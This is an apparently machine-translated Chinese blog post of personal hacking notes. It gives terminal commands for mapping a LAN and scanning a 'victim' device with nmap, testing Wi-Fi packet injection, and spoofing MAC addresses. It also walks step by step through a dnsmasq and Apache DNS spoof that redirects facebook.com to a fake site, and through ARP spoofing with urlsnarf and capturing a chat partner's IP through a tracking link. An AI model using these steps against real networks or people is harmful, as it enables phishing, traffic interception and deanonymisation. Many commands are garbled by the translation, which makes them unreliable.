预先学习的主要内容:很少有技术安全性如此吸引人。 特别是违反它。 我想分享我在不同主题上所做的评论,从某个领域的一般概述到特定的终端命令和攻击过程。


映射本地网络
- arp -a→显示最近连接到LAN的所有设备( 备选方案1:nmap -sP 192.168.0.1–254→使用NMAP从1–254进行Ping扫描网络//备选方案2:nmap 192.168.1.0/24→整个ping扫描子网//备用3 nmap -sP -PT80 192.168.0.1–30→Ping扫描(如果网络已通过TCP 80请求阻止了ICMP)
- nmap 192.168.1.157→在受害设备上显示打开的端口
- sudo nmap -O — osscan-guess 192.168.1.157→检测设备的操作系统
包装注入
仅Kali Linux + airmon-ng
- airmon-ng→查看当前的wlan适配器(在Mac OS X上不起作用)
- ifconfig wlan2 down→随后关闭无线适配器,使其进入监控模式
- airmon-ng start wlan2→以监控器模式启动适配器
- 适配器将创建一个新的接口“ mon0”用于数据包注入
- aireplay-ng -9 mon0→测试“ mon0”检测到的将数据包注入AP的程度
- 以每个AP注入多少软件包的百分比形式查看结果
DNS欺骗
在ec2实例上设置DNS欺骗服务器(详细 教程 ):
- yum install dnsmasq →在ec2实例上安装dnsmasq
- 纳米/etc/dnsmasq.conf→编辑dnsmasq设置
- no-dhcp-interface = [输入 行中断 ]服务器= 8.8.8.8 [输入 行中断 ]无主机[输入 行中断 ] addn-hosts = / etc / dnsmasq.hosts →添加这四行(带有换行符!)在dnsmasq.conf的最上方
- nano /etc/dnsmasq.hosts→创建或打开具有欺骗性域的文件(安装后不直接存在
- 54.77.172.205 www.facebook.com facebook.com→添加将被伪造到dnsmasq.hosts的IP地址,包括假冒/自有内容和域名
- killall dnsmasq →要停止dnsmasq(如果它未运行,则会显示一条错误消息“ dnsmasq:未找到进程”,这很好
- dnsmasq —无守护程序—日志查询→ 启动dnsmasq
- 将计算机上的本地DNS设置更改为ec2实例的IP地址
- 检查dns请求是否仍在网站上得到解决,并显示在ec2 Terminal窗口的dnsmasq日志中
- nano / etc / httpd / conf httpd.conf→编辑apache服务器设置: [ENTER LINE BREAK] DocumentRoot“ / var / www / html” [ENTER LINE BREAK] ServerName facebook.com [ ENTER LINE BREAK ] →添加具有将在httpd.conf末尾被欺骗的域的虚拟服务器(在部分下面)
- 服务httpd重新启动→重新启动Apache服务器
- 在浏览器中检查是否将欺骗性域名重定向到假网站/自己的网站
抓取用户的IP地址(链接):
- 有一个Web服务器,您可以控制该服务器并运行它的访问日志。
- 向您的聊天伙伴发送指向该Web服务器的唯一超链接,让他们单击链接。 例如:http://yourdomain.com/JohnDoe.html(该网页不必存在,抛出404即可)。
- 检查您的Web服务器的访问日志,以获取对/JohnDoe.html的请求的IP地址。
- 您有对话伙伴的IP地址。
- Aircrack-ng→ http ://www.aircrack-ng.org(Aircrack-ng套件对OS X的支持有限,但是可以进行以下工作:aircrack-ng,packetforge-ng,ivstools,makeivs)
- KisMAC→用于Mac OS X的GUI嗅探器/扫描仪应用程序→http://kismac-ng.org/
- 扎克
- mdk3→ 仅适用于Linux
- 流网
- Arpsoof→交换局域网上的拦截数据包
- urlsnarf→以CLF格式返回受害IP访问的所有访问的URL
- 纳帕
- arp -a→显示本地网络上的所有设备
- sudo airport en0嗅探11→在通道11上开始嗅探
- tcpdump -vr /tmp/nameOfReturnedFile.cap→使用嗅探到的流量打开文件
- airport -s→返回具有SSID,BSSID,RSSI,CHANNEL和安全性的所有可用AP
- sudo ifconfig en0 down→关闭机场
- sudo ifconfig en0 up→打开机场
- ifconfig en0 | grep ether→获取Mac Airport的MAC地址
- openssl rand -hex 6 | sed的s / \(.. \)/ \ 1:/ g; s /.$//’→创建随机MAC地址
- sudo ifconfig en0以太d4:33:a3:ed:f2:12 →更改MAC地址
- sudo sysctl -w net.inet.ip.forwarding = 1→激活软件包转发
- urlsnarf -i en0→以CLF格式返回所有访问的URL
- diskutil列表→列出所有驱动器(内部和外部)
- diskutil卸载/ dev / disk1→卸载外部驱动器
- diskutil卸载磁盘/ dev / disk1→卸载外部分区驱动器
- 电弧欺骗
- 同步洪水
- 局域网中的Wifi DoS攻击 (教程)
- 欺骗
- HID键盘攻击→人机接口设备攻击
- 中间人攻击 (教程) : dsniff ( Explenation )→“ dsniff是用于网络审核和渗透测试的工具的集合。 dsniff,filesnarf,mailsnarf,msgsnarf,urlsnarf和webspy被动监视网络中的有趣数据”
会议会议
- SHMOOCON →http://www.shmoocon.org
- DEFCON →https: //www.defcon.org
- THOTCON →http: //thotcon.org
播客
- 吉普森研究公司: https ://www.grc.com/SecurityNow.htm
论坛
- Hackforums.net链接
- HAK5论坛链接
网站
- http://news.hitb.org/→计算机安全新闻网站
- http://hacking.spoonfed.org
- https://www.macports.org→轻松下载并安装终端软件
工具:
- SNORT→https://www.snort.org“ 它是一个开源入侵防御系统,能够进行实时流量分析和数据包记录。”
设备
- Hak5商店:链接
团体
- http://hacking.spoonfed.org
- http://www.milw0rm.nl
代管
- 私人/匿名托管:http://princevps.com